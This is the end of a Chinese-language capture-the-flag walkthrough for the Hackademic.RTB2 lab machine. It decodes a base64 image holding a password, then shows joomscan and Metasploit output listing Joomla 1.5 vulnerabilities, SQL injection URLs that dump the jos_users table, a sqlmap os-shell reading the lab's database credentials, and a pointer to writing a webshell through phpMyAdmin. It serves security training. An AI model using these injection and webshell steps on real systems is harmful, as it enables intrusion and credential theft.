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
AAAAAACg0f8BeD+YFbp5dlYAAAAASUVORK5CYII='''
 
imgdata=base64.b64decode(strs)
file=open('key.png','wb')
file.write(imgdata)
file.close()

python3运行即可得到图片,原图如下:

还可以使用在线工具直接将base64字符串转成图片:

Convert Your Base64 to Image

登陆密码即在图片中,挑战完成,帅!!!

其它方法

  • 使用joomscan扫描可以发现存在非常多的漏洞,远程代码执行,sql注入等等,下载对应的poc或者脚本运行即可
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
root@kali:~# joomscan -u http://192.168.84.143:666/
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.84.143:666/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 1.5

[+] Core Joomla Vulnerability
[++] Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution
EDB : https://www.exploit-db.com/exploits/4212/

Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection
CVE : CVE-2007-4781
EDB : https://www.exploit-db.com/exploits/4350/
                                                                                                       
Joomla! 1.5.x - (Token) Remote Admin Change Password                                                   
CVE : CVE-2008-3681                                                                                    
EDB : https://www.exploit-db.com/exploits/6234/                                                        
                                                                                                       
Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure                                          
CVE: CVE-2011-4909                                                                                     
EDB : https://www.exploit-db.com/exploits/33061/                                                       
                                                                                                       
Joomla! 1.5.x - 404 Error Page Cross-Site Scripting                                                    
EDB : https://www.exploit-db.com/exploits/33378/                                                       
                                                                                                       
Joomla! 1.5.12 - read/exec Remote files                                                                
EDB : https://www.exploit-db.com/exploits/11263/                                                       
                                                                                                       
Joomla! 1.5.12 - connect back Exploit                                                                  
EDB : https://www.exploit-db.com/exploits/11262/                                                       
                                                                                                       
Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)              
CVE : CVE-2011-4908                                                                                    
EDB : https://www.exploit-db.com/exploits/9926/                                                        
                                                                                                       
Joomla! 1.5 - URL Redirecting                                                                          
EDB : https://www.exploit-db.com/exploits/14722/                                                       
                                                                                                       
Joomla! 1.5.x - SQL Error Information Disclosure                                                       
EDB : https://www.exploit-db.com/exploits/34955/                                                       
                                                                                                       
Joomla! - Spam Mail Relay                                                                              
EDB : https://www.exploit-db.com/exploits/15979/                                                       
                                                                                                       
Joomla! 1.5/1.6 - JFilterInput Cross-Site Scripting Bypass                                             
EDB : https://www.exploit-db.com/exploits/16091/                                                       
                                                                                                       
Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities                                        
EDB : https://www.exploit-db.com/exploits/36176/                                                       
                                                                                                       
Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution                                        
CVE : CVE-2015-8562                                                                                    
EDB : https://www.exploit-db.com/exploits/38977/                                                       
                                                                                                       
Joomla! 1.0 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution                  
CVE : CVE-2015-8562 , CVE-2015-8566                                                                    
EDB : https://www.exploit-db.com/exploits/39033/                                                       
                                                                                                       
Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion                                                
CVE : CVE-2007-2199                                                                                    
EDB : https://www.exploit-db.com/exploits/3781/                                                        
                                                                                                       
Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal                                   
CVE : CVE-2009-0113                                                                                    
EDB : https://www.exploit-db.com/exploits/7691/                                                        
                                                                                                       
                                                                                                       
                                                                                                       
[+] Checking Directory Listing                                                                         
[++] directory has directory listing :                                                                 
http://192.168.84.143:666/tmp                                                                          
                                                                                                       
                                                                                                       
[+] Checking apache info/status files                                                                  
[++] Readable info/status files are not found                                                          
                                                                                                       
[+] admin finder                                                                                       
[++] Admin page : http://192.168.84.143:666/administrator/                                             
                                                                                                       
[+] Checking robots.txt existing                                                                       
[++] robots.txt is found                                                                               
path : http://192.168.84.143:666/robots.txt                                                            
                                                                                                       
Interesting path found from robots.txt                                                                 
http://192.168.84.143:666/administrator/                                                               
http://192.168.84.143:666/cache/                                                                       
http://192.168.84.143:666/components/                                                                  
http://192.168.84.143:666/images/                                                                      
http://192.168.84.143:666/includes/                                                                    
http://192.168.84.143:666/installation/                                                                
http://192.168.84.143:666/language/                                                                    
http://192.168.84.143:666/libraries/                                                                   
http://192.168.84.143:666/media/                                                                       
http://192.168.84.143:666/modules/                                                                     
http://192.168.84.143:666/plugins/                                                                     
http://192.168.84.143:666/templates/                                                                   
http://192.168.84.143:666/tmp/                                                                         
http://192.168.84.143:666/xmlrpc/                                                                      
                                                                                                       
                                                                                                       
[+] Finding common backup files name                                                                   
[++] Backup files are not found                                                                        
                                                                                                       
[+] Finding common log files name                                                                      
[++] error log is not found                                                                            
                                                                                                       
[+] Checking sensitive config.php.x file                                                               
[++] Readable config file is found                                                                     
 config file path : http://192.168.84.143:666/configuration.php-dist
  • 使用sqlmap查看配置文件中的phpmyadmin的用户名和密码,然后利用phpmyadmin写木马
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
os-shell> cat configuration.php
do you want to retrieve the command standard output? [Y/n/a] command standard output:
---
<?php
class JConfig {
/* Site Settings */
var $offline = '0';
var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
var $sitename = 'Hackademic.RTB2';
var $editor = 'tinymce';
var $list_limit = '20';
var $legacy = '0';
/* Debug Settings */
var $debug = '0';
var $debug_lang = '0';
/* Database Settings */
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'yUtJklM97W';
var $db = 'joomla';
var $dbprefix = 'jos_';
/* Server Settings */
var $live_site = '';
var $secret = 'iFzlVUCg9BBPoUDU';
var $gzip = '0';
var $error_reporting = '-1';
var $helpurl = 'http://help.joomla.org';
var $xmlrpc_server = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '0';
var $force_ssl = '0';
/* Locale Settings */
var $offset = '0';
var $offset_user = '0';
/* Mail Settings */
var $mailer = 'mail';
var $mailfrom = 'admin@hackademirtb2.com';
var $fromname = 'Hackademic.RTB2';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
/* Cache Settings */
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
/* Meta Settings */
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $MetaTitle = '1';
var $MetaAuthor = '1';
/* SEO Settings */
var $sef           = '0';
var $sef_rewrite   = '0';
var $sef_suffix    = '0';
/* Feed Settings */
var $feed_limit   = 10;
var $feed_email   = 'author';
var $log_path = '/var/www/logs';
var $tmp_path = '/var/www/tmp';
/* Session Setting */
var $lifetime = '15';
var $session_handler = 'database';
}
?>
---

账号密码为:root/yUtJklM97W

具体参考:phpmyadmin getshell

  • 使用msf中的auxiliary/scanner/http/joomla_plugins模块扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
root@kali:~# msfdb run
[+] Starting database
                                                  

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v5.0.63-dev                          ]
+ -- --=[ 1951 exploits - 1091 auxiliary - 334 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use auxiliary/scanner/http/joomla_plugins
msf5 auxiliary(scanner/http/joomla_plugins) > set RHOSTS 192.168.84.143
RHOSTS => 192.168.84.143
msf5 auxiliary(scanner/http/joomla_plugins) > set RPORT 666
RPORT => 666
msf5 auxiliary(scanner/http/joomla_plugins) > exploit 

[+] Plugin: /administrator/ 
[+] Plugin: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ 
[+] Plugin: /administrator/index.php?option=com_searchlog&act=log 
[+] Plugin: /components/com_abc/ 
[+] Page: /index.php?option=com_abc
[+] Plugin: /components/com_amblog/ 
[+] Page: /index.php?option=com_amblog
[+] Plugin: /components/com_banners/ 
[+] Page: /index.php?option=com_banners
[+] Plugin: /components/com_contact/ 
[+] Page: /index.php?option=com_contact
[+] Plugin: /components/com_content/ 
[+] Page: /index.php?option=com_content
[+] Plugin: /components/com_mailto/ 
[+] Plugin: /components/com_media/ 
[+] Plugin: /components/com_newsfeeds/ 
[+] Page: /index.php?option=com_newsfeeds
[+] Plugin: /components/com_poll/ 
[+] Plugin: /components/com_search/ 
[+] Plugin: /components/com_user/ 
[+] Page: /index.php?option=com_user
[+] Plugin: /components/com_user/controller.php 
[+] Plugin: /components/com_weblinks/ 
[+] Page: /index.php?option=com_weblinks
[+] Plugin: /components/com_wrapper/ 
[+] Page: /index.php?option=com_wrapper
[+] Plugin: /includes/joomla.php 
[+] Plugin: /index.php?option=com_abc&view=abc&letter=AS&sectionid=' 
[+] Vulnerability: Potential SQL Injection
[+] Plugin: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version 
[+] Page: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
[+] Plugin: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- 
[+] Page: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos
[+] Plugin: /libraries/joomla/utilities/compat/php50x.php 
[+] Plugin: /libraries/phpmailer/phpmailer.php 
[+] Plugin: /libraries/phpxmlrpc/xmlrpcs.php 
[+] Plugin: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ 
[+] Plugin: /plugins/editors/xstandard/attachmentlibrary.php 
[+] Plugin: /templates/ja_purity/ 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

发现存在注入漏洞,接下来sqlmap一波就行。

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…